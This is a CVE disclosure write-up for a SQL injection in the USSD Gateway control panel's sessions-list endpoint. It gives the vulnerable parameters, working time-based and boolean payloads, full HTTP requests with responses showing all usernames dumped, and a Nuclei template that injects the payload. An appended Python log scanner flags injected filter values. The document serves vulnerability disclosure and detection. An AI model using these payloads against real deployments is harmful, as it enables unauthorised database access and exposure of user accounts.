# [CVE-2025-65236] USSD Gateway SQL Injection - Sessions

## Description

SQL Injection in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems](https://opencode.com/) allows a user who has access to the vulnerable function to dump the database by injecting SQL commands. \
<https://www.cve.org/CVERecord?id=CVE-2025-65236>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint**: `/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t`
* **Vulnerable Parameters**: `flt_sessid` and `flt_user`
* **Payload Sample:** `flt_sessid=1; SELECT SLEEP(5)#`

## Exploitation

The default request retrieves the account details, including the username, for the given account ID. Both `flt_sessid` and `flt_user` are the vulnerable parameters. The request and its response are shown below.

```http
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002&flt_user=&flt_server_node=VSSTEST01AOCFRV
```

```http
HTTP/2 200 OK
[...]


[...]
<td align=left>00000002</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>   
</TD>
</TR>
</TABLE>
[...]
```

By appending the payload to the `flt_sessid` parameter, all the usernames are returned in the response.

> Other payloads work as well; the one below was used as the PoC.

```http
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t HTTP/2
Host: hostname
Cookie: openid-state=c2b[...]Ic%22%3B%7D; OCPANEL-SESSIONID=1h[...]v6o; _csrf=a1[...]nAyIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
[...]

_csrf=K6[...]iB0qQ&display=1&flt_sessid=00000002'+or+1=1--+-&flt_user=&flt_server_node=VSSTEST01AOCFRV
```

```http
HTTP/2 200 OK
[...]

<td align=left>00000002</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>  
<td align=left>00000003</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr> 
<td align=left>00000004</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>  
<td align=left>00000005</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>  
<td align=left>00000006</td><td align=center>[...]</td><td align=center>[...]</td><td align=center>USERNAME</td><td align=center>0</td><td align=center>127.0.0.1</td></tr>
[...]
</TD>
</TR>
</TABLE>
[...]
```

## Nuclei Template

You can use this template for easy detection.

> Adjust the `_csrf` token and cookies if required.

```yaml
id: ocussdgw-list_sessions-sqli-time

info:
  name: USSD Gateway OCP Control Panel SQL Injection
  author: Eslam Ali Akl @eslam3kl
  severity: high
  description: |
    Time-based SQL injection test for the list_sessions_t endpoint.
    Injects a SLEEP(5) payload into the `flt_sessid` and `flt_user` parameters and flags the
    target if the response time indicates the SQL sleep was executed.
    Adjust `_csrf`, cookies or headers if authentication is required.
  tags: [sqli, time-based, ocpanel, ocussdgw]

requests:
  - id: time_inject_flt_sessid
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002'; SELECT SLEEP(5)#&flt_user=&flt_server_node=VSSTEST01AOCFRV"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"

  - id: time_inject_flt_user
    method: POST
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t"
    headers:
      Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
      X-Requested-With: "XMLHttpRequest"
      User-Agent: "nuclei-scan"
    body: "_csrf=K6[...]iB0qQ%3D%3D&display=1&flt_sessid=00000002&flt_user=admin'; SELECT SLEEP(5)#&flt_server_node=VSSTEST01AOCFRV"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 4"
```
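A defensive complement to the template above, added here as an example that is not part of the advisory: a Python allowlist check that scans constructed, tab-separated request logs for POSTs to the vulnerable `list_sessions_t` action whose `flt_sessid` or `flt_user` values do not have the shape a legitimate filter would. The 8-digit `flt_sessid` form is taken from the advisory's responses; the `flt_user` pattern, the log layout and the sample lines are assumptions.

```python
"""Constructed example: flag requests to the list_sessions_t endpoint whose filter
parameters do not look like legitimate values. Not part of the advisory."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and action parameters named in the advisory.
VULN_PATH = "/occontrolpanel/index.php"
VULN_QUERY = {"w": "ocussdgw", "m": "sessions", "a": "list_sessions_t"}
# Assumed legitimate shapes (not vendor-documented): flt_sessid is an 8-digit id as seen
# in the advisory's responses; flt_user is assumed to be a plain account name or empty.
EXPECTED = {
    "flt_sessid": re.compile(r"[0-9]{8}"),
    "flt_user": re.compile(r"[A-Za-z0-9_.@-]{0,64}"),
}

def is_vulnerable_endpoint(url: str) -> bool:
    """True when the path and query select the sessions list action."""
    parts = urlsplit(url)
    if parts.path != VULN_PATH:
        return False
    query = {k: v[-1] for k, v in parse_qs(parts.query).items()}
    return all(query.get(k) == v for k, v in VULN_QUERY.items())

def suspicious_params(body: str) -> dict:
    """Return {param: decoded value} for filter values that fail the allowlist."""
    form = parse_qs(body, keep_blank_values=True)
    return {name: value
            for name, pattern in EXPECTED.items()
            for value in form.get(name, [])
            if not pattern.fullmatch(value)}

def scan_log(lines):
    """Lines are constructed, tab-separated: timestamp, src_ip, method, url, form body."""
    hits = []
    for line in lines:
        ts, src, method, url, body = line.split("\t", 4)
        if method == "POST" and is_vulnerable_endpoint(url):
            bad = suspicious_params(body)
            if bad:
                hits.append({"ts": ts, "src": src, "params": bad})
    return hits

# Constructed sample log; bodies mirror the advisory's benign and injected requests.
SAMPLE_LOG = [
    "2025-11-20T10:00:01Z\t10.0.0.5\tPOST\t/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t\t_csrf=x&display=1&flt_sessid=00000002&flt_user=&flt_server_node=VSSTEST01AOCFRV",
    "2025-11-20T10:00:07Z\t10.0.0.9\tPOST\t/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t\t_csrf=x&display=1&flt_sessid=00000002'+or+1=1--+-&flt_user=&flt_server_node=VSSTEST01AOCFRV",
    "2025-11-20T10:00:09Z\t10.0.0.9\tPOST\t/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_t\t_csrf=x&display=1&flt_sessid=00000002&flt_user=admin'; SELECT SLEEP(5)#&flt_server_node=VSSTEST01AOCFRV",
    "2025-11-20T10:00:11Z\t10.0.0.5\tGET\t/occontrolpanel/index.php?w=ocussdgw&m=other\t",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)  # two hits from 10.0.0.9; the benign request and the GET are not flagged
```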

